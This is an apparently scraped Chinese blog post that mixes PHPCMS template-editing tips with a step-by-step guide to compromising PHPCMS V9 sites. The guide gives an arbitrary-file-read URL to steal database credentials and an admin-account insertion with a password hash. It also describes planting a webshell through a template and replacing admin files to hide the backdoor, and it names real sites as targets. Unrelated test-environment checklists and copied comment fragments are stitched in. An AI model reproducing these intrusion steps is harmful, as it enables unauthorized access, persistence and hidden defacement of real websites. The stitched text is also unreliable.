作者:hacker发布时间:2022-07-17分类:网络黑客浏览:153评论:4
就是页面版权申明,就像你写一篇文章署名一样,浏览器并不执行它的
generator是发生器的意思,可能代表的是生成这样的是PhpCMS系统
1 phpcms是二次开发用的,速度快,首先你的了解熟悉其框架运行流程,能看懂手册
2.一般我们拿它开发修改最大的地方是 /phpcms/template/default/content 里的脚本比如首页是index.html 先改这个页面就可以
3.如果要创建栏目就需要修改 category.html(频道页) list.html(列表页) show.html(内容页),他们是一一相对的,你可以参照源码分析一下,
4.css js image 文件在根目录/statics 把文件一一对应放进去就可以,不建议私自更改位置,因为一旦系统升级更新什么的你的代码可能会乱,按框架默认的就好,在后台里他的设置看下图
5 样式,js知道了就主要改上面说到的 /phpcms/template/default/content里的文件即可,看下图
6.如果你有自己写的栏目 列表 后台里怎么查看呢,看下图
点开内容看栏目 具体的数据 就点内容
7.把以上流程弄明白就可以迅速开发了
本文利用了PHPCMS V9的两个漏洞,一个是读取任意文件漏洞,另一个是模版运行php脚本漏洞。使用到的工具:Navicat for Mysql/IE浏览器(建议使用代理)/湛蓝v9代码包(包含文中使用到的所有文件、代码和木马)
1、放置data.txt以备在目标站点读取并在目标站点生成PHP木马脚本使用。
例如将data.txt放置在yun.baidu.com/j0192/data.txt
2、通过v9漏洞获取配置信息(请参阅:phpcms V9最新读取站点任意文件漏洞)。
/index.php?m=searchc=indexa=public_get_suggest_keywordurl=asdfq=../../phpsso_server/caches/configs/database.php
3、通过v9系统漏洞获取到的数据库信息远程登陆目标站点数据库,在v9_admin和v9_sso_admin表中添加账号
username字段:admn
password字段:10203d4623c1957d041818196ff9822a
encrypt 字段:bGV22e
issuper 字段: 1
4、通过数据库添加管理员账号后使用以下用户名密码在后台登陆,然后修改当前用户密码。
用户名:admn
密码:123456
5、ctrl+a复制write.php全部内容粘贴进v9默认模版下的footer.html保存,然后点击footer.html的可视化运行该模版中的脚本,到此时就完成在目标站点生成木马脚本。
6、打开ifeng.com/caches/caches_template/default/wap/data.class.php
用户名:admin
密码:admin
7、隐藏新增加的管理员。
通过木马脚本上传替换/phpcms/modules/admin/admin_manage.php(默认匹配%admn%),然后登陆目标站点后台查看管理员列表是否还有用户名为admn的超级管理员,如果没有则表明我们完成了新加管理员的隐藏。
8、隐藏新增加的关联链接
通过木马脚本上传替换/phpcms/modules/admin/keylink.php((默认匹配%skyhome%))
9、将目标网站的漏洞修复,以防其他黑客入侵。
通过木马脚本上传替换/phpcms/modules/search/index.php
防黑参考:
1、关闭数据库远程访问。
2、静态文件及附件等文件目录禁止执行权限。
3、脚本文件目录禁止写权限。
4、系统后台等重要目录限制IP访问。
5、及时关注开源系统官方补丁升级和乌云、sebug等漏洞发布平台,修复系统漏洞。
测试环境搭建步骤:
1.数据库服务器端测试环境安装步骤:
(1) 选择服务器
(2) 安装操作系统
(3) 安装数据库
(4) 安装杀毒软件
(5) 杀毒
(6) 制作Image文件
(7) 安装软件数据库文件
(8) 进行相关数据库配置
(9) 杀毒
(10) 制作Image文件
2. 应用服务器端测试环境安装步骤:
(1) 选择服务器
(2) 安装操作系统
(3) 安装数据库
(4) 安装杀毒软件
(5) 杀毒
(6) 制作Image文件
(7) 安装软件数据库文件
(8) 进行相关数据库配置
(9) 杀毒
(10)制作Image文件
3. 客户端测试环境安装步骤:
(1) 选择PC机
(2) 安装操作系统
(3) 安装杀毒软件
(4) 安装软件要求的浏览器版本
(5) 测试与应用服务器的链接
(6) 杀毒
(7) 制作Image文件。
标签:phpcms渗透工具
已有4位网友发表了看法:
访客 评论于 2022-07-17 19:13:39 回复
户名:admn密码:1234565、ctrl+a复制write.php全部内容粘贴进v9默认模版下的footer.html保存,然后点击footer.html的可视化运行该模版中的脚本,到此时就完成在目标站点生成木马脚本。6、打开ifeng.com/ca
访客 评论于 2022-07-17 23:30:49 回复
择服务器 (2) 安装操作系统 (3) 安装数据库 (4) 安装杀毒软件 (5) 杀毒 (6) 制作Image文件 (7) 安装软件数据库文件 (8) 进行相关数据库配置 (9) 杀毒 (10)制作Image文件 3. 客户端测试环境安装步骤: (1) 选择PC机 (2) 安装操作系统
访客 评论于 2022-07-17 21:55:44 回复
tegory.html(频道页) list.html(列表页) show.html(内容页),他们是一一相对的,你可以参照源码分析一下,4.css js image 文件在根目录/static
访客 评论于 2022-07-18 03:05:13 回复
开发用的,速度快,首先你的了解熟悉其框架运行流程,能看懂手册2.一般我们拿它开发修改最大的地方是 /phpcms/template/default/content 里